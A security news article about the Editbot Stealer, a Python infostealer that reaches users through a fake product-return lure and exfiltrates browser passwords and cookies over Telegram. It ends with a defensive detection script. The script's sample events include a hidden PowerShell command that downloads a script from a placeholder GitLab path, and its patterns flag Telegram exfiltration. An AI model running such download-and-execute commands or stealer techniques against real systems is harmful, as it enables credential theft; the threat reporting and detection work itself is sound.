Information stealer targeting social media users

esteria.white

A new threat has appeared on the dark web: the Editbot Stealer. Recently discovered by Cyble Research and Intelligence Labs (CRIL), this Python-based information stealer poses a significant risk to the sensitive data of social media users.

Initially detected as a WinRAR archive file on VirusTotal, the Editbot Stealer showed minimal detection rates, prompting CRIL to analyse it further.

What unfolded was a meticulously designed, multi-stage attack aimed at evading detection, downloading additional payloads, and establishing persistence on the victim’s system.

Editbot Stealer: the new information stealer on the dark web

Editbot Stealer
Source: Cyble

The campaign orchestrated by the threat actors (TAs) abuses open source code sharing platforms such as GitLab to retrieve the payloads for subsequent stages. The downloaded payload, a Python-based stealer, is capable of stealing critical information such as passwords, cookies and web data. To complete the chain, the Editbot Stealer uses a Telegram channel to transmit the stolen data to the TAs.

Editbot Stealer
Source: Cyble

On December 5, an investigation by Cyble Research and Intelligence Labs (CRIL) uncovered a potentially malicious RAR file on VirusTotal, prompting a quick review as similar files surfaced within a short period of time. The identified archive is linked to a social media scam that lures users with the pretext of a “defective product to return”. The TAs leverage the appeal of popular products to entice users to interact with misleading pages, thereby expanding their reach through user engagement.

Editbot Stealer
Source: Cyble

The Editbot Stealer uses a multi-stage infection chain that begins with a malicious batch file named “Screenshot Product Photo Sample.bat” and a JSON file named “manifest.json”. Using PowerShell commands, the TAs establish persistence by downloading and running the Python-based stealer during each login session.

Editbot Stealer
Source: Cyble

Features and capabilities of Editbot Stealer

Features of Editbot Stealer
Source: Cyble

Technical analysis of the Editbot Stealer reveals the core of the malware: the Python script “libb1.py” lists running processes, extracts sensitive information from various web browsers and transmits the data to a specified Telegram channel.

Editbot Stealer list of targeted browsers
Source: Cyble

During execution, the stealer enumerates running processes and extracts sensitive information from browsers such as Chrome, Firefox, Edge, Opera, Brave-Browser, CocCoc and Chromium. It retrieves files such as Cookies, Login Data, Web Data and Local State, saving them in a designated directory under the %temp% folder.

Code to decrypt Editbot Stealer login information
Source: Cyble

The Editbot Stealer goes further by decrypting the saved passwords and writing login information, URLs and decrypted passwords to a text file named “pass.txt”. It also parses the SQLite “Cookies” database file, extracting cookie information and storing the details in “cookie.txt” when the cookie belongs to a social media site.
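The infection chain described above (batch file, PowerShell download from GitLab, Python stealer exfiltrating over Telegram) lends itself to stage-correlation detection. The following is an added example written for this article, not code from Cyble or from the malware: it runs simple per-stage predicates over constructed, Sysmon-style process events and alerts on hosts where two or more stages fire. The event schema, host names and the GitLab path are assumptions.

```python
import re
from collections import defaultdict

# Constructed, simplified process/network events in a hypothetical flat schema
# (host, parent image, image, command line, destination host). Not real telemetry.
EVENTS = [
    {"host": "ws1", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c "C:\\Users\\u\\Downloads\\Screenshot Product Photo Sample.bat"',
     "dest": ""},
    {"host": "ws1", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c iwr https://gitlab.com/PLACEHOLDER/libb1.py -OutFile %TEMP%\\libb1.py",
     "dest": "gitlab.com"},
    {"host": "ws1", "parent": "powershell.exe", "image": "python.exe",
     "cmdline": "python.exe %TEMP%\\libb1.py", "dest": "api.telegram.org"},
    # Benign developer activity on another host: Python launched from a shell, talking to PyPI.
    {"host": "ws2", "parent": "powershell.exe", "image": "python.exe",
     "cmdline": "python.exe build.py", "dest": "pypi.org"},
]

# One predicate per stage of the chain reported in the article.
STAGES = {
    "bat_dropper": lambda e: e["image"] == "cmd.exe"
        and re.search(r"screenshot product photo sample\.bat", e["cmdline"], re.I) is not None,
    "powershell_gitlab_download": lambda e: e["image"] == "powershell.exe"
        and e["parent"] == "cmd.exe" and "gitlab.com" in e["dest"]
        and re.search(r"\.py\b", e["cmdline"], re.I) is not None,
    "python_telegram_exfil": lambda e: e["image"] == "python.exe"
        and e["dest"].endswith("api.telegram.org"),
}


def match_stages(events):
    """Return {host: set(stage names)} for every stage predicate that fires."""
    hits = defaultdict(set)
    for e in events:
        for name, pred in STAGES.items():
            if pred(e):
                hits[e["host"]].add(name)
    return dict(hits)


def alert_hosts(events, min_stages=2):
    """Hosts where at least `min_stages` distinct stages fired. A single stage
    (e.g. python.exe reaching Telegram) is a weak signal on its own; the
    correlation across stages is what makes the alert actionable."""
    return sorted(h for h, s in match_stages(events).items() if len(s) >= min_stages)


if __name__ == "__main__":
    print(match_stages(EVENTS))
    print("alert:", alert_hosts(EVENTS))
```

In a real deployment the predicates would be fed from EDR or Sysmon event IDs 1 and 3 and the %temp% artefacts named above (pass.txt, cookie.txt) could be added as a further stage.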

